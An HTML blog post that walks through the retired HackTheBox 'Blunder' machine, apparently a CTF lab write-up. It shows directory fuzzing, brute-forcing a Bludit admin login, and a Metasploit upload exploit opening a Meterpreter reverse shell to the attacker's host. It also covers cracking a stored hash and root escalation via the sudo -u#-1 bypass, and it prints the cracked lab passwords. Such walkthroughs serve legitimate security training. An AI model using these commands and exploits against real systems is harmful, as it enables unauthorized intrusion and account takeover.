<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="map[name:S0S4]">
<meta name="description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA |http-generator: Blunder | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts
USER Only port 80 is opened so let&amp;rsquo;s enter:
After a while enumerating the page manually I didn&amp;rsquo;t find anything, so I decided to fuzz the web with wfuzz:
wfuzz -c -u http://10." />
<meta name="keywords" content=", writeup, retired, hackthebox" />
<meta name="robots" content="noodp" />
<meta name="theme-color" content="#252627" />
<link rel="canonical" href="https://S0S4.gitlab.io/posts/htbblunder/" />


    <title>
        
            {HTB}BLUNDER :: Sosa&#39;S Blog  — Hope you like your Instance!
        
    </title>



<link href="https://cdnjs.cloudflare.com/ajax/libs/flag-icon-css/3.5.0/css/flag-icon.min.css" rel="stylesheet"
    type="text/css">



<link rel="stylesheet" href="https://S0S4.gitlab.io/main.f522490e210589ddc6038ceec3f6da3332e6fc3a6333f481f7ee04980b41dac4.css">




    <link rel="apple-touch-icon" sizes="180x180" href="https://S0S4.gitlab.io/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://S0S4.gitlab.io/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://S0S4.gitlab.io/favicon-16x16.png">
    <link rel="manifest" href="https://S0S4.gitlab.io/site.webmanifest">
    <link rel="mask-icon" href="https://S0S4.gitlab.io/safari-pinned-tab.svg" color="#252627">
    <link rel="shortcut icon" href="https://S0S4.gitlab.io/favicon.ico">
    <meta name="msapplication-TileColor" content="#252627">
    <meta name="theme-color" content="#252627">



<meta itemprop="name" content="{HTB}BLUNDER">
<meta itemprop="description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA |http-generator: Blunder | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts
USER Only port 80 is opened so let&rsquo;s enter:
After a while enumerating the page manually I didn&rsquo;t find anything, so I decided to fuzz the web with wfuzz:
wfuzz -c -u http://10.">
<meta itemprop="datePublished" content="2020-10-17T00:00:00+00:00" />
<meta itemprop="dateModified" content="2020-10-17T00:00:00+00:00" />
<meta itemprop="wordCount" content="761">
<meta itemprop="image" content="https://S0S4.gitlab.io"/>



<meta itemprop="keywords" content="writeup,retired,hackthebox," />

<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://S0S4.gitlab.io"/>

<meta name="twitter:title" content="{HTB}BLUNDER"/>
<meta name="twitter:description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA |http-generator: Blunder | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts
USER Only port 80 is opened so let&rsquo;s enter:
After a while enumerating the page manually I didn&rsquo;t find anything, so I decided to fuzz the web with wfuzz:
wfuzz -c -u http://10."/>



    <meta property="og:title" content="{HTB}BLUNDER" />
<meta property="og:description" content="ENUMERATION PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA |http-generator: Blunder | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts
USER Only port 80 is opened so let&rsquo;s enter:
After a while enumerating the page manually I didn&rsquo;t find anything, so I decided to fuzz the web with wfuzz:
wfuzz -c -u http://10." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://S0S4.gitlab.io/posts/htbblunder/" />
<meta property="og:image" content="https://S0S4.gitlab.io"/>
<meta property="article:published_time" content="2020-10-17T00:00:00+00:00" />
<meta property="article:modified_time" content="2020-10-17T00:00:00+00:00" />





    <meta property="article:section" content="writeup" />



    <meta property="article:published_time" content="2020-10-17 00:00:00 &#43;0000 UTC" />








    </head>

    <body class="dark-theme">
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="https://S0S4.gitlab.io/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">></span>
            <span class="logo__text">$ rm -rf /sosa</span>
            <span class="logo__cursor" style=
                  "
                   
                   ">
            </span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="https://S0S4.gitlab.io/about/">About</a></li><li><a href="https://S0S4.gitlab.io/posts/">Posts</a></li>
    </ul>
</nav>

                <span class="menu-trigger">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"/>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
                    </svg>
                </span>
            

            <span class="theme-toggle unselectable"><svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"/>
</svg>
</span>
        </span>
    </span>
</header>


            <div class="content">
                
  <main class="post">

    <div class="post-info">
      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-clock">
          <circle cx="12" cy="12" r="10"></circle>
          <polyline points="12 6 12 12 16 14"></polyline>
        </svg>
        4 minutes

        
      </p>
    </div>

    <article>
      <h1 class="post-title">
        <a href="https://S0S4.gitlab.io/posts/htbblunder/">{HTB}BLUNDER</a>
      </h1>

      

      <div class="post-content">
        <h2 id="enumeration">ENUMERATION</h2>
<p>PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|<em>http-generator: Blunder
| http-methods:
|</em>  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts</p>
<h2 id="user">USER</h2>
<p>Only port 80 is opened so let&rsquo;s enter:</p>
<p><img src="https://S0S4.gitlab.io/static/images/blunder/FOTOWEB.png" alt="alt text" title="webphoto"></p>
<p>After a while enumerating the page manually I didn&rsquo;t find anything, so I decided to fuzz the web with wfuzz:</p>
<pre><code>wfuzz -c -u http://10.10.10.191/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404
</code></pre><p><img src="https://S0S4.gitlab.io/static/images/blunder/wfuzz.png" alt="alt text" title="fuzzing"></p>
<p>Entering on this directories, I didn&rsquo;t find anything interesting apart from <code>/admin</code> that redirects me to a login pannel</p>
<p><img src="https://S0S4.gitlab.io/static/images/blunder/login.png" alt="alt text" title="login"></p>
<p>I&rsquo;ll use another time wfuzz to enumerate some .txt and some .php files</p>
<pre><code>wfuzz -c -u http://10.10.10.191/FUZZ.FUZ2Z -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,php-txt --hc 404
</code></pre><p><img src="https://S0S4.gitlab.io/static/images/blunder/wfuzz2.png" alt="alt text" title="fuzzing2"></p>
<p>Ouhh! This can be important directories! let&rsquo;s go one by one checking them well.
After inspecting them the most importants are: <code>todo.txt</code> and <code>install.php</code>, as you can see in install.php, the web page is using <a href="https://www.bludit.com/">bludit</a>
but the most important part is in <code>todo.txt</code>:</p>
<pre><code>-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
</code></pre><p>This is what appears on <code>todo.txt</code> I see that fergus probably is a valid username for the login page, with this username I decided to bruteforce, I tried with hydra and  didn&rsquo;t get anything so I tried to search a valid exploit, using searchsploit I found this exploit on ruby:</p>
<p><img src="https://S0S4.gitlab.io/static/images/blunder/exploit.png" alt="alt text" title="exploit"></p>
<p>so with searchsploit -m I downloaded the exploit, once I have it give&rsquo;s me some errors because I didn&rsquo;t have the modules so I just installed them:</p>
<pre><code>sudo gem install httpclient;
sudo gem install docopt;
</code></pre><p>Once I have all installed this should work correctly, It didn&rsquo;t work well so I checked the code again, and see that in line 22 it puts:</p>
<pre><code># dirty workaround to remove this warning:
#   Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need &quot;.&quot; at the beginning.
# see https://github.com/nahi/httpclient/issues/252
class WebAgent
  class Cookie &lt; HTTP::Cookie
    def domain
      self.original_domain
    end
  end
end
</code></pre><p>I just commented all this part and the exploit works! now just use the path it give&rsquo;s:</p>
<pre><code>ruby 48746.rb -r http://10.10.10.191/admin/ -u fergus -w /usr/share/wordlists/rockyou/
</code></pre><p>After 15 minutes it didn&rsquo;t found the password with rockyou.txt , so I decided to use cewl:</p>
<pre><code>cewl 10.10.10.191 -w dict.txt
</code></pre><p>I use the same syntax of the command, but just changing the wordlists, and it found the password!! in this case is: RolandDeschain</p>
<p><img src="https://S0S4.gitlab.io/static/images/blunder/passwd.png" alt="alt text" title="passwd"></p>
<p>Now it&rsquo;s time to login, once in, after enumerating the page a few minutes I found that in <code>new content</code> I can upload a file, with a quick search on google I find this <a href="https://github.com/bludit/bludit/issues/1081">issue</a> bytheway I was unable to put it in practice so I used metasploit:</p>
<pre><code>
$ msfconsole
## ....
msf5 &gt; search bludit

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  –  –                                          – ----------- –  –  –       – - –  – ---------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability

msf5 &gt; use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

msf5 exploit(linux/http/bludit_upload_images_exec) &gt; set bluditpass RolandDeschain
bluditpass =&gt; RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) &gt; set bludituser fergus
bludituser =&gt; fergus
msf5 exploit(linux/http/bludit_upload_images_exec) &gt; set rhosts 10.10.10.191
rhosts =&gt; 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) &gt; set lhost tun0
lhost =&gt; tun0
msf5 exploit(linux/http/bludit_upload_images_exec) &gt; exploit

[*] Started reverse TCP handler on 10.10.14.5:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading WsNfOGdZfz.png...
[*] Uploading .htaccess...
[*] Executing WsNfOGdZfz.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.5:4444 -&gt; 10.10.10.191:51734) at 2020-10-04 16:20:13 +0100
[+] Deleted .htaccess

meterpreter &gt; shell

python3 -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ export SHELL=bash
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ stty rows 47 columns 238
</code></pre><h2 id="second-user">SECOND USER</h2>
<p>Once here I start enumerating the box manually as usual and found that the machine have the user <code>hugo</code> and <code>shaun</code>, enumerating a bit more I found that in <code>/var/www/bludit-3.10.0a/bl-content/databases/users.php</code> there are the credentials for the user hugo:</p>
<p><img src="https://S0S4.gitlab.io/static/images/blunder/creds.png" alt="alt text" title="creds"></p>
<p>I take the hash,crack it on crackstation, and give me this password: <code>Password120</code></p>
<p><img src="https://S0S4.gitlab.io/static/images/blunder/crack.png" alt="alt text" title="crack"></p>
<h2 id="root">ROOT</h2>
<p>This root is very easy, you just have to do sudo -l to see what the user hugo can execute as root, in this case is /bin/bash after seeing that !root, sudo version also confirms it:</p>
<pre><code>hugo@blunder:~$ sudo --version
sudo --version
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$
</code></pre><p>I searched a exploit for this sudo version that explain what to do in this cases, the <a href="https://www.exploit-db.com/exploits/47502">exploit</a></p>
<p>In this case I just have to do: <code>sudo -u#-1 /bin/bash</code> and I will be root instantly</p>
<p><img src="https://S0S4.gitlab.io/static/images/blunder/ruteo.png" alt="alt text" title="root"></p>

      </div>
    </article>

    <hr />

    <div class="post-info">
      
    <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-tag meta-icon"><path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line></svg>

        <span class="tag"><a href="https://S0S4.gitlab.io/tags/writeup/">writeup</a></span>
        <span class="tag"><a href="https://S0S4.gitlab.io/tags/retired/">retired</a></span>
        <span class="tag"><a href="https://S0S4.gitlab.io/tags/hackthebox/">hackthebox</a></span>
        
    </p>

      
    <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-folder meta-icon"><path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path></svg>

        <span class="tag"><a href="https://S0S4.gitlab.io/categories/writeup/">writeup</a></span>
        
    </p>


      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text">
          <path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path>
          <polyline points="14 2 14 8 20 8"></polyline>
          <line x1="16" y1="13" x2="8" y2="13"></line>
          <line x1="16" y1="17" x2="8" y2="17"></line>
          <polyline points="10 9 9 9 8 9"></polyline>
        </svg>
        761 Words
      </p>

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar">
          <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>
          <line x1="16" y1="2" x2="16" y2="6"></line>
          <line x1="8" y1="2" x2="8" y2="6"></line>
          <line x1="3" y1="10" x2="21" y2="10"></line>
        </svg>
        
          2020-10-17 02:00
        

         
          
        
      </p>
    </div>

    
      <div class="pagination">
        <div class="pagination__title">
          <span class="pagination__title-h"></span>
          <hr />
        </div>

        <div class="pagination__buttons">
          

          
            <span class="button next">
              <a href="https://S0S4.gitlab.io/posts/htbcache/">
                <span class="button__text">{HTB}CACHE</span>
                <span class="button__icon">→</span>
              </a>
            </span>
          
        </div>
      </div>
    


    

  </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>&copy; 2020</span>
            
                <span><a href="https://S0S4.gitlab.io">Sosa</a></span>
            
            
                <span><a href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC BY-NC 4.0</a></span>
            
            <span> <a href="https://S0S4.gitlab.io/posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 1 1 1 1 1 1"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
          </div>
    </div>
</footer>

            
        </div>

        




<script type="text/javascript" src="https://S0S4.gitlab.io/bundle.min.dc716e9092c9820b77f96da294d0120aeeb189b5bcea9752309ebea27fd53bbe6b13cffb2aca8ecf32525647ceb7001f76091de4199ac5a3caa432c070247f5b.js" crossorigin="anonymous"></script>



    </body>
</html>
